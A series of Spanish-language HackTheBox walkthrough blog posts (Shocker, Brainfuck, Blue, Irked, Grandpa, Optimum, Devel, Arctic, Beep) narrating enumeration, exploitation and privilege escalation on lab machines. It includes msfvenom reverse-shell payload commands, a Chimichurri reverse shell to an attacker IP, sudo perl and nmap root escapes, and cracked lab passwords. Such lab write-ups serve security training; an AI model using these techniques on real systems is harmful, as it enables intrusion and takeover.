Walkthrough

Buenos días, hoy venimos con una nueva máquina en HackTheBox la cual se
trata de Shocker, es máquina sencilla en la cual podremos poner a prueba nuestras habilidades explotando la vulnerabilidad de Shellshock
Para empezar con esta máquina con nmap hemos realizado una enumeración que nos ha encontrado los siguientes puertos abiertos

Profundizando algo sobre estos puertos, nos encontramos un servidor Apache en el puerto 80 y un servicio ssh en el puerto 2222

Para empezar con dirbuster hemos ido en búsqueda de posibles carpetas o archivos, con el hemos encontrado un archivos interesante en /cgi-bin/user.sh

Sobre este archivo hemos podido ver que vulnerable a shellshock, por lo que con curl hemos explotado de la siguiente manera, añadiendo una reverse shell hacia nuestro equipo

Si el paso anterior fue bien nos debería abrir una nueva shell sobre la máquina con el usuario shelly

Dentro de la carpeta personal /home/shelly de este usuario nos encontramos con la primera flag la de user.txt

Con este usuario ejecutando sudo -l nos encontramos que puede utilizar perl con privilegios

Con esta información, hemos encontramos que podemos hacer un bypass con perl y obtener un shell con privilegios (root) utilizando el siguiente comando
perl -e ‘exec «/bin/sh»;’

Con esta nueva sesión con root ya tenemos acceso a /root donde podremos obtener la última flag root.txt

Como conclusión final vemos que se trata de una máquina sencilla, donde quizás la parte más complicada sería en la parte de enumeración para encontrar la ruta vulnerable.

Espero que os haya gustado, nos vemos en próximo post
Saludos!

Buenos días, hoy venimos con una nueva máquina en HackTheBox la cual se trata de Brainfuck, en esta podrás poner a prueba tus habilidades vulnerando un WordPress y tus conocimientos en criptografía descifrando un mensaje secreto
Para empezar con esta máquina con nmap hemos realizado una enumeración que nos ha encontrado los siguientes puertos abiertos

Haciendo un análisis más profundo de estos puertos obtenemos el siguiente resultado

Al entrar al servidor web en el puerto 443 nos encontramos con una pagina por defecto de nginx, con dirbuster hemos tratado de buscar carpetas y archivos sin ningún resultado. Con sslscan hemos hecho un escaneo del certificado instalado y hemos podido descubrir los siguientes nombres brainfuck.htb y sup3rs3cr3t.brainfuck.htb

Añadiendo estos nombre a nuestro archivo hosts, podemos ver que el nombre brainfuck.htb responde ahora con un web hecha en wordpress y sup3rs3cr3t.brainfuck.htb responde un foro

Ha esta página hecha en wordpress el hemos pasado la herramienta wpscan con la que hemos podido descubrir, un plugin instalado wp support plus responsive ticket system en la versión 7.1.3 (https://github.com/jhsalves/wp-support-plus-responsive-ticket-system)

Investigando sobre este plugin hemos podido encontrar un exploit (https://www.exploit-db.com/exploits/41006) que afecta a este versión que nos permitirá acceder al panel de administración del wordpress.

Para explotar esta vulnerabilidad deberemos dirigirnos a la página (https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/loginGuestFacebook.php), lo que nos aparecerá una página en blanco, ahora deberemos editar el html de la página y añadiremos el siguiente formulario

Con el formulario añadido y el nombre de usuario admin le daremos a login lo que nos llevara a otra página en blanco

Con esto hecho si nos vamos a wp-admin veremos que tendremos la sesión iniciada como admin de wordpress. Antes en la página principal hemos visto en un post el mensaje de «SMTP integration is ready», por lo que hemos decidido buscar algún plugin o algo relacionado con esto, dentro de Settings -> Easy WP SMTP vemos que hay una credenciales puestas. En el campo de SMTP Password editamos el campos y cambios el type de password a text lo que nos mostrara la password que hay introducida de este modo tendremos usuario y password.

Con este usuario obtenido, en el puerto 143 tenemos el servicio IMAP por lo que podemos ver los distintos email del usuario

Logueados con el usuario dentro del servicio IMAP vemos que hay distintos emails, en el email con el id nº2 hemos encontrado las credenciales para el foro secreto.

Con estas credenciales accedemos al foro secreto y nos encontramos un post de SSH Access, donde el último mensaje vemos que se abre un hilo nuevo encriptado

Dentro de este hilo nos encontramos el siguiente texto codificado

Desde cyberchef haciendo pruebas (https://gchq.github.io/CyberChef/) hemos descubierto que mensaje ha sido cifrado mediante Vigenere, pero para decodificar el mensaje necesitamos la clave. En distintos mensajes vemos que usuario acabe siempre con el comentario «Orestis – Hacking for fun and profit» por lo que hemos probado esta clave lo que nos ha dado el resultado de «Brainfuckmybrainfuckmybrainfu» desde frase vemos que hay un trozo que se repite «fuckmybrain»

Dentro de los mensaje encriptado parece que hay un enlace que hemos probado a descodificar con la clave fuckmybrain lo que nos ha dado el siguiente enlace (https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa)

Con este enlace obtenido hemos podido descargar lo que parece ser la clave rsa para poder conectarnos por ssh a la máquina.

Al intentar conectarnos por ssh nos encontramos que nos pide una contraseña, por lo que con ssh2john sacaremos el hash para poder crackear la password con John The Ripper.

Hecho esto descubrimos que la password es 3poulakia! , con la que ya podremos acceder mediante ssh a la máquina

Dentro de la carpeta principal del usuario /home/orestis, encontraremos nuestra primera flag la de user.txt

Investigando sobre la máquina nos encontramos que se trata de un Ubuntu 16.04.2 que es vulnerable al exploit BPF Sign Extension Prvilege Escalation

(https://www.exploit-db.com/exploits/45058)

Para ello primero hemos abierto un sesión en metasploit con ssh_login y migrando esta shell a meterpreter, hecho esto hemos utilizado el exploit comentado.
Para ello deberemos configurar la session, nuetro lhost y el lport que queramos

Configurado el exploit tendremos una nueva sesión como root por lo que tendremos acceso a la última flag de root.txt ubicada en /root/root.txt

Como conclusión final vemos que se trata de una máquina completa donde ponemos a prueba nuestra habilidades en la parte web explotando un wordpress, también ponemos a prueba nuestra habilidades de criptografía donde tendremos que descifrar los mensajes secretos encontrados en el foro y por último una escalada de privilegios utilizando un exploit.

Espero que os haya gustado, nos vemos en próximo post
Saludos!

Blue es una de las máquinas más sencillas de Hack The Box. Pero demuestra el impacto que tuvo la vulnerabilidad de EternalBlue, que se ha utilizado para comprometer a muchas empresas a nivel global a través de distintos ataques de ransomware.
Para empezar la máquina es realizar un reconocimiento y enumeración, para ello utilizaremos nmap que nos devolverá una primera lista de puertos abiertos

Teniendo los puertos abiertos identificados indagaremos un poco más sobre estos utilizando la opción -A en nmap

El anterior escaneo podemos ver que se trata de un sistema Windows 7 Profesional, con el puerto 445 smb con nmap y la opción –script vuln haremos un rápido análisis para ver si es vulnerable a algún ataque

Después de esto vemos que es la vulnerabilidad de EternalBlue (MS17-010), en ExploitDB encontramos el siguiente exploit compatible con el sistema auditado (https://www.exploit-db.com/exploits/42031)

Para este exploit necesitaremos el siguiente shellcode (https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/42030.asm)

Con el shellcode descargado con nasm -f bin lo ensambla en un archivo binario

Después generaremos nuestro payload mediante msfvenom -p windows/x64/shell_reverse_tcp lhost=IP lport=PUERTO -f raw -o payload.bin

Con estos 2 archivos procederemos a juntarlo esto lo podemos hacer mediante cat de la siguiente forma:

Con este nuevo archivo exploit.bin, procederemos a lanzar nuestro exploit para la vulenrabilidad de EternalBlue, para ello debemos indicar la ip y el archivo bin generado.
Nota: Antes de lanzar este exploit debemos tener un netcat a la escucha con el puerto indicado anteriormete en el comando de msfvenom

Una vez lanzado el exploit nos abrira una nueva shell sobre la máquina como usuario SYSTEM por lo que tendremos control total sobre la máquina

La primera flag de la máquina la encontraremos en c:UsersharisDesktopuser.txt

La segunda flag de root c:UsersAdministratorDesktoproot.txt

Como podeis ver es un máquina bastante sencilla, donde explotamos un vulnerabilidad que ha sido tan importante como Eternalblue.
Espero que os haya gustado, nos vemos en próximo post
Saludos!

Irked es una máquina en HackTheBox basada en Linux bastante simple y directa que requiere de habilidades básicas de enumeración.
En primer lugar hemos procedido a realizar la enumeración de puertos de la máquina utilizando nmap
nmap -sS -A 10.10.10.117 -T4
El resultado de este análisis nos muestra tres puertos abiertos 22, 80 y 111. Si abrimos el navegador el puerto 80 nos parece una pagina con el siguiente mensaje «IRC is almost working» lo que no shace pensar que puede haber algún otro puerto más abierto.
Por eso procedemos con nmap a buscar todos los posibles puerto abiertos
nmap -sS -p- 10.10.10.117 -T4

Terminado el análisis podemos ver nuevos puertos abiertos que no habíamos visto antes, en este caso debemos prestar atención al puerto 6697 que nos da pistas de poder ser un irc. Investigando un poquito más podemos confirmar que se trata de un IRC.
Sabiendo esto con nmap podemos verificar si se trata de una versión troyanizada de de UnrealIRCD,
nmap –script=irc-unrealircd-backdoor -p6697 10.10.10.117 -T4
Terminado el análisis tenemos un resultado afirmativo por lo que tenemos punto de entrada en la máquina. En este caso utilizaremos metasploit que tiene disponible un módulo para explotar esta vulnerabilidad, para ello abrimos msfconosle y buscamos unrealirc

Seleccionado el exploit, procederemos a configurarlo indicando el rhosts y el rport y seleccionando el payload cmd/unix/reverse

Configurado nuestro exploit lo lanzamos y si todo va bien deberíamos tener una nueva sesión abierta en la máquina con el usuario ircd

Con esta nueva sesión procedemos a la escalada de privilegios , después de un rato investigando listando los archivo suid vemos el archivo /usr/bin/viewuser que no viene en la instalación standard de Debian

Al ejecutar este binario nos da error que no se encuentra /tmp/listusers. Por esto dentro de /tmp creamos un archivo listusers.c con el siguiente código

Hecho esto primero debemos compilar este archivo
gcc listusers.c -o listusers
Compilado si ejecutamos el binario viewusers nos debería abrir una shell como root

Ahora con esta shell con permisos podemos obtener las flags, la primera flag la podemos obetener en /home/djmardov/Documents/user.txt

La segunda flag la podemos encontrar en /root/root.txt

Si has llegado hasta aquí enhorabuena! Como ves esta es un máquina
sencilla donde vemos como IRC sobre linux y realizar una escalada de privilegios explotando un binario suid, si te ha gustado sígueme y nos vemos en la próxima !

Bienvenidos de nuevo, a un nuevo walkthrough, esta vez se trata de la máquina Grandpa en HackTheBox, que es una máquina Windows donde expplotaremos un servidor IIS.

En primer lugar, como en todas las máquinas empezaremos una enumeración de puertos mediante nmap con los parámetros -sV que nos intentará indicar las versiones de los servicios corriendo en los puertos, -sC que ejecutara los scripts básicos de nmap y -O que nos intentara identificar el sistema operativo de la máquina

El resultado del análisis del nmap vemos que saca un puerto abierto en el 80, y que se trata de un servidor IIS 6.0, con nmap hemos ejecutado un script donde nos saca que este servidor tiene WebDav activado.
nmap –script=http-iis-webdav-vuln -p80 10.10.10.14

En esta version de IIS 6.0 y con Webdav sabemos que es vulnerable a un Buffer Overflow, para ello abriremos nuestra consola de metasploit msfconsole buscaremos iis y seleccionaremos el exploit iis_webdav_scstoragepathfromurl

Seleccionado el exploit configuraremos el rhosts y el lhost, y si todo funciona correctamente se nso debería abrir una nueva sesión.

Una vez dentro ejecutaremos systeminfo que nos brindará información sobre el sistema en este caso nos encontramos con un Windows Server 2003

Sabiendo esto hemos ejecutado windows-exploit-suggester que nos indica que puede ser vulnerable a ms14_070_tcpip_ioctl, por lo que buscamos y seleccionamos dicho exploit

Una vez seleccionado estableceremos los parametros necesarios SESSION, LHOST y LPORT

Una vez configurado lo lanzamos y s enos debería abrir una nueva sesión esta vez como SYSTEM

Ahora como tenemos acceso total sobre la máquina podremos acceder a las 2 flags que las podemos encontrar en c:UsersHarryDesktop y c:UsersAdministratorDesktop

Si has llegado hasta aquí enhorabuena! Como ves esta es un máquina
sencilla donde vemos como exploitar un servidor IIS en Windows, si te ha gustado sígueme y nos vemos en la próxima !

Bienvenidos a esta nueva entrada, hoy traemos la máquina Optimum en HackTheBox. Se trata de una máquina basada en Windows bastante sencilla debido a que tiene pocos servicios corriendo y para la explotación es una ruta bastante directa
En primer lugar haremos una enumeración de puertos con nmapnmap -n -sV -sC -O 10.10.10.8 -T4

Terminado el análisis con nmap nos muestra un solo servicio en el puerto 80 que se trata de HttpFileServer en la versión 2.3. Con un poco de búsqueda que esta versión tiene una vulnerabilidad de RCE (CVE-2014-6287) que tiene un módulo de metasploit disponible.
Para ello abriremos la consola de metasploit msfconosle y buscaremos rejetto lo que nos devolverá una opción

Seleccionado nuestro exploit procederemos a configurarlo, una vez configurado si lo hemos hecho correctamente se nos debería abrir una nueva sesión sobre la máquina con el usuario kostas

Con el usuario kostas si nos vamos a c:UserskostasDesktop podremos conseguir la primera flag de la máquina

La ejecución de sysinfo en Meterpreter nos muestra que se trata de un Windows 2012 R2 con arquitectura x64. Sería prudente migrar a un proceso x64 en este punto, ya que el shell reverse_tcp por defecto es de arquitectura x86. Utilizaremos el comando ps para listar los procesos, luego migraremos al proceso explorer.exe porque es un proceso x64, utilizando el comando migrate pid
Después de un poco de búsqueda nos encontramos que esta máquina es vulnerable a MS16-032, para ello utilizaremos el exploit ms16_032_secondary_logon_handle_privesc

Configurado el exploit si lo tenemos todo correcto nos debería abrir una nueva shell con permisos de SYSTEM

Al tener permisos de SYSTEM podremos obtener la segunda flag que la encontramos en la ruta c:UsersAdministratorDesktop

Si has llegado hasta aquí enhorabuena! Como ves esta es un máquina
sencilla que es bastante directa y que se puede hacer rápido. Espero que te haya
sido de utilidad nos vemos en la próxima

Bienvenidos de nuevo, a un nuevo walkthrough, esta vez se trata de la máquina Devel en HackTheBox, que es una máquina Windows bastante sencilla donde solo tiene disponibles 2 servicios.

En primer lugar, como en todas las máquinas empezaremos una enumeración de puertos mediante nmap con los parámetros -sV que nos intentará indicar las versiones de los servicios corriendo en los puertos, -sC que ejecutara los scripts básicos de nmap y -O que nos intentara identificar el sistema operativo de la máquina
nmap -n -sV -sC -O 10.10.10.5 -T4

En el resultado de nmap podemos ver que tenemos 2 servicios un ftp que permite el acceso anónimo y un servidor web.

Accediendo al ftp podemos ver la raíz de la parte web y además se nos permite subir archivos por lo que hemos decido crear un payload con msfvenom. En este caso hemos elegido meterpreter reverse tcp para window en formatos, debido a que la máquina objetivo se trata de un sistema operativo Windows y el servidor se trata de un iis con asp
msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o shell.aspx LHOST=10.10.14.12 LPORT=4444

Creado el payload hemos accedido al ftp y hemos subido dicho payload

Una vez lo tenemos subido abreimos una nueva consola de mestasploit msfconosle y configuraremos un nuevo handler. En primer lugar, se deberá asignar el mismo payload que hemos creado y asignaremos la ip y puertos elegidos

Una vez configurado, nos dirigiremos al navegador accederemos a nuestra máquina y apuntaremos al payload que hemos subido mediante el ftp

Abierta la ventana se nos debería haber iniciado una nueva sesión en metasploit

Una vez dentro de la máquina vemos que se trata de un Windows 7 x86.
Hemos ejecutado el módulo local_exploit_suggester de metasploit y hemos visto que vulnerable a ms10_015_kitrap0d. Por lo tanto dentro de metasploit buscamos dicha vulerabilidad y procedemos a configurarla

Una vez configurado lanzamos el exploit y vemos que se nos ha abierto una nueva sesión en metasploit esta vez con permisos de SYSTEM sobre la máquina por lo que podremos conseguir las flags del usuario y del administrador

Dentro de la ruta c:UsersbabisDesktop encontraremos la primera flag del usuario

Y en la ruta c:UsersAdministratorDesktop encontrarás la segunda flag por lo que ya habrás terminado esta máquina

Si has llegado hasta aquí enhorabuena! Como ves esta es un máquina sencilla que se puede hacer con relativa rapidez. Espero que te haya sido de utilidad nos vemos en la próxima

Artic es una máquina de HackTheBox basada en Windows que tiene una pequeña lista de servicios en ejecución que nos permitirá explotar una conocida tecnología,
Para empezar la máquina hemos procedido a realizar una enumeración de puertos mediante nmap
nmap -sV -sC -T4 10.10.10.11

En el listado de puertos encontrados por nmap podemos ver el puerto 8500 que parece interesante, donde si accedemos a él mediante el navegador nos encontramos con una estructura con distintas carpetas y ficheros.

Indagando más dentro de esta estructura nos podemos encontrar en CFIDE/administrator/index.cfm que se trata del software Adobe ColdFusion 8

Esta versión de Coldfusion es vulnerable a un directory transversal que a continuación nos permitirá obtener más información para poder acceder a la máquina

Con este exploit que hemos encontrado apuntamos a la ip de Artic junto con el puerto 8500 encontrado, en este caso intentaremos ver el archivo password.properties que se encuentra dentro de la carpeta de instalación de Coldfusion y que contiene en su interior la password de administración de este.

El hash encontrado lo hemos pasado en Crackstation y hemos podido ver que se trata de la password «happyday»

Con estas credenciales obtenidas mediante el panel de administración de Coldfusion podremos subir una shell que nos dará acceso a la máquina. Para ello mediante msfvenom generamos un nuevo payload java/jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PUERTO -f raw > shell.jsp

Una vez generado nuestro payload dejaremos corriendo un servidor web básico mediante python que nos permitira servir nuestro payload a la maquina objetivo
python3 -m http.server

Con estos pasos realizados accedemos al panel de adminsitración, en primer lugar nos dirgiremos a Server Settings -> Mappings podremos ver la dirección donde esta instalado Coldfusion en nuestra máquina objetivo

Sabiendo esta ruta nos dirigimos a Debugging & Logging -> Scheduled Tasks y creamos una nueva tarea.
En esta nueva tarea introduciremos un nuevo nombre, en la url pondremos la URL de nuestro equipo en el puerto 8000 que hemos generado anteriormente con python, deberemos marcar la opción «save output to file» para que genere el archivo y en File pondremos la ruta en la máquina que hemos visto antes más el nombre que queremos por ejemplo shell.jsp

Generada la tarea si nos dirigimos a la raíz de la carpeta nos encontraemos con la shell que hemos creado mediante la tarea

Para acceder a nuestra shell con netcat nc -nlvp PUERTO debemos escuchar en el puerto que hemos seleccionado en el payload y abrir la shell en el navegador, hecho esto se nos debería abrir la shell en nuestra máquina atacante

En esta nueva shell tenemos acceso a la máquina objetivo con el usuario tolis, dentro del perfil de este usuario encontraremos nuestra primera flag

Para la escalada de privilegios en primer lugar hemos ejecutado el comando systeminfo que nos dejará ver que se trata de un sistema operativo Windows Server 2008 R2 SP0 sin ningún hotfix instalado, por lo que procederemos explotar la vulnerabilidad MS10-059 mediante Chimichurri

Para ello mediante el script de python smbserver.py que nos permitirá crear un recurso comaprtido samba desde donde podremos copiar el ejecutable de Chimichurri sudo python3 smbserver.py nombre_recurso carpeta_compartir

Ahora desde windows con el comando copy \IP-ATACANTEnombre-recursoChimichurri.exe copiaremos el archivo dentro de la máquina windows objetivo

Copiado nuestro archivo procederemos a ejecutar pasandole 2 parámetros la IP de nuestra máquina y el puerto deseado .Chimichurri.exe 10.10.14.2 1234 esto nos permitira abrir una reverse shell con permisos administrador

Antes de ejecutarlo desde la máquina atacante con netcat nc -nlvp PUERTO pondremos a eschucar el puerto que hayamos elegido en Chimichurri, una vez tengamos netcat a la escucha ejecutamos chimichurri y ya tendriamos nuestra shell con permisos abierta, que no permitirá acceder al perfil del administrador y conseguir nuestra segunda flag

Enhorabuena! si has llegado hasta aquí ya deberías tener las 2 flags y con una shell con permisos abierta, nos vemos en los próximos posts
Saludos!

Beep es una máquina de HackTheBox basada en linux que tiene una lista muy grande de servicios en ejecución, lo que puede hacer que sea un poco difícil encontrar al principio l apuerta de entrada a la máquina.
En un primer lugar hemos hecho una enumeración de puerto mediante nmap lo que nos ha descubierto una lista de puerto interesante 22 (SSH), 25 (SMTP), 80 (HTTP), 110 (POP3), 111 (RPCBIND), 143 (IMAP), 443 (HTTPS), 993 (IMAP), 3306 (MYSQL), 10000 (HTTP)

Visitando el puerto 443 nos encontramos que nos carga un página de Elastix que es un servidor de comunicaciones IP PBX, IM, etc.

Buscando sobre este software nos encontramos que la versión 2.2.0 es vulnerable a un LFI, lo que nos permitiría ver los archivos o ejecutar scripts locales dentro del contexto del proceso web.

Intentamos explotar esta vulnerabilidad intentando ver el archivo /etc/amportal.conf que es un archivo que contiene distintas configuraciones de Elastix. En este caso nos encontramos una password en ARI_ADMIN_PASSWORD y un nombre de usuario que parece ser admin

Con las credenciales conseguidas intentamos acceder y conseguimos hacerlo con éxito, teniendo esto nos encontramos con un exploit que nos permitirá un a ejecución remota de código que no permitirá conseguir una shell

Con nuestras credenciales iniciadas dentro de Elastix nos vamos a Security -> Weak Keys y nos encontramos con la extensión 233

Esta extensión encontrada la utilizaremos en nuestro exploit

Editado nuestro exploit abriremos con netcat un puerto a la espera donde se conectará de vuelta la máquina con nuestra shell.

Una vez tenemos la shell nos encontramos con el usuario asterisk dentro del host beep

Intentamos conseguir algo más de información y nos encontramos un CentOS 5.6

Con esta información seguimos enumerando y nos encontramos que la máquina tiene el software nmap instalada y se puede ejecutar, sabiendo esto podremos un intentar conseguir una shell como root mediante nmap. Para ello ejecutaremos sudo nmap –interactive una vez dentro de la consola interactiva ejecutaremos !sh que nos dará un shell con el usuario root

Con el usuario root ya podremos acceder a las flags una dentro del usuario fanis (user.txt) y otro dentro de root

Enhorabuena, con esto ya hemos conseguido nuestras flags y ya hemos terminado la máquina